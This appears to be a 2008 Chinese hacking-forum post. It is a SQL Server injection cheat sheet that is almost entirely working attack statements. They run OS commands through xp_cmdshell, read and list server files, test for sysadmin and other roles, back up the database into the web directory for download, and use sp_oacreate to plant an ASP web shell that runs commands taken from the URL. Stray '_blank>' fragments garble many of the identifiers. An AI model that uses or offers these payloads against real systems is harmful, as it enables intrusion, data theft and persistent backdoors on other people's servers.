- 帖子
- 3852
- 积分
- 13044
- 威望
- 16780
- 金钱
- 36761
- 在线时间
- 1139 小时
|
5楼
发表于 2008-7-3 19:58
| 只看该作者
得到hash之后,就可以进行暴力破解。
遍历目录的方法: 先创建一个临时表:temp
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
;insert temp exec master.dbo.xp_blank>_availablemedia;-- 获得当前所有驱动器
;insert into temp(id) exec master.dbo.xp_blank>_subdirs c:\;-- 获得子目录列表
;insert into temp(id,num1) exec master.dbo.xp_blank>_dirtree c:\;-- 获得所有子目录的目录树结构,并寸入temp表中
;insert into temp(id) exec master.dbo.xp_blank>_cmdshell type c:\web\index.asp;-- 查看某个文件的内容
;insert into temp(id) exec master.dbo.xp_blank>_cmdshell dir c:\;--
;insert into temp(id) exec master.dbo.xp_blank>_cmdshell dir c:\ *.asp /s/a;--
;insert into temp(id) exec master.dbo.xp_blank> _cmdshell cscript C:\Inetpub\AdminScripts\adsutil.vbs enum w3svc
;insert into temp(id,num1) exec master.dbo.xp_blank>_dirtree c:\;-- (xp_blank>_dirtree适用权限PUBLIC)
写入表:
语句1:and 1= (SELECT IS_blank>_SRVROLEMEMBER(sysadmin));--
语句2:and 1=(SELECT IS_blank>_SRVROLEMEMBER (serveradmin));--
语句3:and 1=(SELECT IS_blank>_SRVROLEMEMBER(setupadmin));--
语句4:and 1=(SELECT IS_blank>_SRVROLEMEMBER(securityadmin));--
语句5:and 1=(SELECT IS_blank>_SRVROLEMEMBER (securityadmin));--
语句6:and 1=(SELECT IS_blank>_SRVROLEMEMBER(diskadmin));--
语句7:and 1= (SELECT IS_blank>_SRVROLEMEMBER(bulkadmin));--
语句8:and 1=(SELECT IS_blank>_SRVROLEMEMBER (bulkadmin));--
语句9:and 1=(SELECT IS_blank>_MEMBER(db_blank>_owner));--
把路径写到表中去:
;create table dirs(paths varchar(100), id int)--
;insert dirs exec master.dbo.xp_blank>_dirtree c:\--
and 0<>(select top 1 paths from dirs)--
and 0<> (select top 1 paths from dirs where paths not in(@Inetpub))--
;create table dirs1(paths varchar(100), id int)--
;insert dirs exec master.dbo.xp_blank>_dirtree e:\web--
and 0<>(select top 1 paths from dirs1)--
把_blank>数据库备份到网页目录:下载
;declare @a sysname; set @a=db_blank>_name();backup database @a to disk=e:\web\down.bak;--
and 1=(Select top 1 name from(Select top 12 id,name from sysobjects where xtype=char(85)) T order by id desc)
and 1=(Select Top 1 col_blank>_name(object_blank>_id(USER_blank>_LOGIN),1) from sysobjects) 参看相关表。
and 1=(select user_blank>_id from USER_blank>_LOGIN)
and 0=(select user from USER_blank>_LOGIN where user>1)
-=- wscript.shell example -=-
declare @o int
exec sp_blank>_oacreate wscript.shell, @o out
exec sp_blank>_oamethod @o, run, NULL, notepad.exe
; declare @o int exec sp_blank>_oacreate wscript.shell, @o out exec sp_blank>_oamethod @o, run, NULL, notepad.exe--
declare @o int, @f int, @t int, @ret int
declare @line varchar(8000)
exec sp_blank>_oacreate scripting.filesystemobject, @o out
exec sp_blank>_oamethod @o, opentextfile, @f out, c:\boot.ini, 1
exec @ret = sp_blank>_oamethod @f, readline, @line out
while( @ret = 0 )
begin
print @line
exec @ret = sp_blank>_oamethod @f, readline, @line out
end
declare @o int, @f int, @t int, @ret int
exec sp_blank>_oacreate scripting.filesystemobject, @o out
exec sp_blank>_oamethod @o, createtextfile, @f out, c:\inetpub\wwwroot\foo.asp, 1
exec @ret = sp_blank>_oamethod @f, writeline, NULL,
<% set o = server.createobject("wscript.shell"): o.run( request.querystring("cmd") ) %>
declare @o int, @ret int
exec sp_blank>_oacreate speech.voicetext, @o out
exec sp_blank> _oamethod @o, register, NULL, foo, bar
exec sp_blank>_oasetproperty @o, speed, 150
exec sp_blank>_oamethod @o, speak, NULL, all your sequel servers are belong to,us, 528
waitfor delay 00:00:05
; declare @o int, @ret int exec sp_blank>_oacreate speech.voicetext, @o out exec sp_blank>_oamethod @o, register, NULL, foo, bar exec sp_blank>_oasetproperty @o, speed, 150 exec sp_blank>_oamethod @o, speak, NULL, all your sequel servers are belong to us, 528 waitfor delay 00:00:05--
xp_blank>_dirtree适用权限PUBLIC
exec master.dbo.xp_blank>_dirtree c:\
返回的信息有两个字段 subdirectory、depth。Subdirectory字段是字符型,depth字段是整形字段。
create table dirs(paths varchar(100), id int)
建表,这里建的表是和上面xp_blank>_dirtree相关连,字段相等、类型相同。
insert dirs exec master.dbo.xp_blank>_dirtree c:\
只要我们建表与存储进程返回的字段相定义相等就能够执行!达到写表的效果, 一步步达到我们想要的信息! |
|